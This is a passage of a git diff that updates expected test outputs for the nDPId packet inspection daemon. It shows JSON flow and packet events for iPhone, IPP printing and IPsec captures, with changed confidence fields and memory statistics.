+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":486,"total-skipped-flows":0,"total-l4-payload-len":190360,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":50,"total-detection-updates":40,"total-updates":0,"current-active-flows":0,"total-active-flows":51,"total-idle-flows":51,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1582454600748} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 500/486 @@ -321,9 +321,9 @@ ~~ total active/idle flows...: 51/51 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6194411 bytes -~~ total memory freed........: 6194411 bytes -~~ total allocations/frees...: 119032/119032 +~~ total memory allocated....: 6328045 bytes +~~ total memory freed........: 6328045 bytes +~~ total allocations/frees...: 121794/121794 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 3629 chars diff --git a/test/results/ipp.pcap.out b/test/results/ipp.pcap.out index 693d51f45..da3fd54a7 100644 --- a/test/results/ipp.pcap.out +++ b/test/results/ipp.pcap.out @@ -4,20 +4,20 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} -00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} +00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} -00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} -00926{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} +00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} +00926{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":279,"packets-processed":277,"total-skipped-flows":0,"total-l4-payload-len":230224,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1210953939492} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 279/277 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879803 bytes -~~ total memory freed........: 5879803 bytes -~~ total allocations/frees...: 118411/118411 +~~ total memory allocated....: 6013437 bytes +~~ total memory freed........: 6013437 bytes +~~ total allocations/frees...: 121173/121173 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1004 chars diff --git a/test/results/ipsec_isakmp_esp.pcap.out b/test/results/ipsec_isakmp_esp.pcap.out index de102e773..c17130cff 100644 --- a/test/results/ipsec_isakmp_esp.pcap.out +++ b/test/results/ipsec_isakmp_esp.pcap.out @@ -2,242 +2,242 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946744635161} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946744635161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946744635161,"pkt":"eJS0JASgYDjgxTWgCABFAANMRLRAAD8RBzLAqAJkbe27wTikEZQDOKGBAAAAALZO8yExpIlShrq9OQSIaVUuICMIAAAAAQAAAywjAAMQxP+M24ss5zxVviUOnYt8V91Yfad7H5TKYI1AzQJmVQ1775vqK4lAOGdGsvlvOkX2Namze+gxnoVLyUAsp8SwHxJQwtql3LAOZXSDDfTnjzJHUODCqYiBpOt6uikxP095kw8q3tMwzSSPxcuj7XnW6PzRBCGEtG5neD4sVk+l1JkUVcikyt4uOcC\/FA8QvmxhLpkegjtMpjAsxLE3vpMBtiZj+zT0jhYqc9k6vSPwaeAn85HWGyImbG4DzrmeTU5UQgHG42GPzTrJc4WLmObte9S00AsQVQ9A9LBK7HPddpmzlyoydy05a7OrcGa87mSenEZtlJg6Srp22ovHxgUAaNXH5mPObtMfqQ\/ZO07eMESAHqJ0a5Gd6IHROQKUZIGLAHdP0GpNPOgz2hcQhC5MCG8SlPoyqs7YHAhIq7dkn82ncfrQg5LG4rFBalatIKS6za3YCBaUd6HgjP76noPl8Do6aqlBwL8fyDSwzzm05t4rCUJTqDfHbdLklbf0nPbCgstxAP6c4hbiTTjn\/qk7utZRt9YQcbWpqDJcanmCdmb1nL0mJbhqNJKT0laV1UV3x3fjRglRQgmAhhs2hUSJo0d4NihfES7R2EorTgVqgQI4yo5XdLXhVuIgKP4Ku8zRjlfJmEVoLMy3a7RLdjn6RWIc0T1R9cczYK8i8MjgqoZquR76DAlISwr878UZk6Dw9jKHBkUClj00siMfCWOzBAbTMxpNKDHfy5dB\/OC4DjkU8Jx5W